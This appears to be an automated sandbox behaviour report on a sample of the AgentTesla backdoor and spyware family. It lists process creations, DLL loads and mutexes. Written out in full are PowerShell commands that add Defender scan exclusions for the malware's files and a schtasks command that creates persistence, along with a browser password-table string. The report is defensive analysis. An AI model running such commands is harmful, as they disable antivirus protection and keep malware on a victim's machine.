Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, Q8JnI8OnJ7YHJb50np.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, Q8JnI8OnJ7YHJb50np.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, Q8JnI8OnJ7YHJb50np.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/15@4/4

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

File created: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

File created: C:\Users\user\AppData\Local\Temp\tmp550.tmp

Jump to behavior

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002AA7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002F46000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002F56000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp16A5.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process created: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process created: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp550.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe "C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xRAvleeiuDbJ" /XML "C:\Users\user\AppData\Local\Temp\tmp16A5.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process created: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Process created: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe "C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Section loaded: dpapi.dll	Jump to behavior
